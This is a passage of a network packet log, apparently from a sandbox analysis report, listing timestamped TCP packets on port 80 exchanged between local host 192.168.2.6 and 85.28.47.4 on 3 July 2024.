Jul 3, 2024 18:08:39.960582018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960596085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960606098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960613966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960613966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960617065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960628986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960639000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960649967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960649967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960650921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960673094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960683107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960685015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960695982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960705996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960716963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960717916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960717916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960726976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960737944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960748911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960760117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960766077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960766077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960783958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960794926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960807085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960819006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960819006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960891008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961195946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961210012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961229086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961260080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961260080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961344004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961361885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961374044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961390972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961400986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961401939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961401939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961414099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961435080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961435080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961436987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961448908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961461067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961472034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961483002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.961484909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961484909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961525917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.961525917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.045993090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046169996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046180010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046190977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046201944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046212912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046225071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046236038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046247005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046330929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046330929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046330929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046330929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046375036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046386003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046396971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046406984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046417952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046427965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046441078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046473980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046473980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046538115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046577930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046602964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046618938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046667099 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046667099 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046710968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046721935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046732903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046746016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046786070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046786070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046849012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046859026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046870947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046896935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046905994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046905994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046907902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046920061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046930075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.046956062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.046956062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047131062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047142029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047142029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047159910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047171116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047183990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047185898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047185898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047194958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047205925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047230005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047230005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047353983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047393084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047393084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047422886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047432899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047444105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047456026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047488928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047489882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047553062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047681093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047698975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047709942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047722101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047735929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047736883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047736883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047746897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047758102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047768116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047779083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047790051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047796011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047796011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047800064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047811985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.047832012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.047832012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048203945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048235893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048247099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048257113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048268080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048279047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048316002 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048316002 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048393011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048403978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048414946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048425913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048435926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048446894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048458099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048460007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048460007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048470020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048486948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048496962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048513889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048593998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048835039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048846006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048856020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048866987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048877954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048877954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048888922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048899889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048909903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048922062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048932076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048934937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048934937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048943996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048954010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048964977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048973083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048973083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.048976898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.048990011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049024105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049024105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049428940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049439907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049452066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049463034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049474001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049484968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049495935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049500942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049500942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049506903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049519062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049530029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049536943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049536943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049540997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049552917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049563885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049576998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049587965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049587965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049633026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049918890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049928904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049940109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049952030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.049983025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.049983025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050026894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050039053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050049067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050061941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050072908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050084114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050084114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050084114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050096989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050108910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050120115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050132990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.050133944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050133944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050177097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.050177097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.134908915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.134931087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.134944916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.134955883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.134967089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.134979010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135013103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135013103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135049105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135063887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135076046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135140896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135173082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135185003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135196924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135207891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135220051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135237932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135261059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135261059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135323048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135435104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135447025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135458946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135478020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135479927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135492086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135503054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135514021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135519028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135519981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135528088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135586977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135648012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135653019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135658979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135708094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135708094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135754108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135766029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135776997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135798931 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135802031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135814905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.135849953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135849953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.135998964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136022091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136033058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136044979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136058092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136069059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136069059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136080980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136090994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136091948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136091948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136142969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136142969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136293888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136306047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136317015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136341095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136352062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136363983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136364937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136364937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136375904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136387110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136415958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136415958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136593103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136605978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136617899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136629105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136641026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136651993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136667013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136667013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136833906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136846066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136863947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136876106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136876106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136887074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136898994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136909962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136920929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136921883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136921883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136938095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136950016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136962891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136962891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.136966944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.136979103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137013912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137015104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137186050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137209892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137248039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137248039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137342930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137355089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137365103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137376070 CEST	80	49710	85.28.47.4	192.168.2.6
